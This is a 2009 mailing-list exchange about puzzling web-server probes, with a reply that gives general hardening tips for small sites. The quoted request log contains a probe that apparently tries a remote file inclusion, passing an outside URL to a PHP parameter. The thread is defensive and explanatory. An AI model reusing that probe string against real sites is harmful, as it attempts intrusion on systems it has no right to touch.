Jim Lawrence
accessd at shaw.ca
Fri Apr 10 12:41:53 CDT 2009
Hi Peter: All sites get probed for weaknesses on the web. That is pretty standard. Below is a list of common searches performed by serious hackers looking for opportunities: 1. If any of your directories are readable and have important data that information can be cleamed. If you have any important data in a website it is open to anyone. There are many open-source or free products like 'BackStreetBrowser' (http://www.spadixbd.com/backstreet/) that can copy a whole site as fast as the bandwidth will allow. 2. Any directories that are writable can be used to either store temporary information or leave time-bombs in hope that you may try and run them... some gullible or tired webmasters have even inadvertently spawned zombies on their sites that way. 3. Some sites that have open FTP (command line) accessible and even password protected may find someone running a little loop routine attempting a dictionary attack... given that there are usually no limits to how many 'trys' the hacker is allowed. 4. If you manager your own mail within your website build your mail service correctly. Use a Captcha, return email etc... Any web site beyond a Postcard site needs a database and a programmed backend for security and management. 5. If you do have admin access from your site keep the pasword long and filled with mixed cases, numbers and special characters. Outside of that you are really pretty safe. If you are using IIS, check you logs and see if there is a consistency of login attempts: c:<windows directory>/system32/logfiles/*.log and if there is you can block the range of IPs through IIS > default SMTP > properties > Connection > add. The site http://whois.domaintools.com/ can be a great source for specifics on a hacker's locations. (I have found traditionally client's attackers are from China and central European.) You may already know all this but I HTH. Jim -----Original Message----- From: dba-tech-bounces at databaseadvisors.com [mailto:dba-tech-bounces at databaseadvisors.com] On Behalf Of Peter Brawley Sent: Thursday, April 09, 2009 8:36 PM To: Discussion of Hardware and Software issues Subject: [dba-Tech] weird website probes I've taken to studying NotFound/Unauthorised errors at our site. We get hundreds of weird probes a day, mostly in bursts, eg just a few minutes ago we got about a dozen of these in a few seconds: www.artfulsoftware.com/php_mysql_win.html%20%20/index.php?var=http://www.can didography.com/zero/id1.txt?? www.artfulsoftware.com/php_mysql_win.html is a real page. The rest looks like a probe of some sort. A probe for what? GET-based vulnerabilities? Anybody have an idea what such vandals might be trying to accomplish? PB _______________________________________________ dba-Tech mailing list dba-Tech at databaseadvisors.com http://databaseadvisors.com/mailman/listinfo/dba-tech Website: http://www.databaseadvisors.com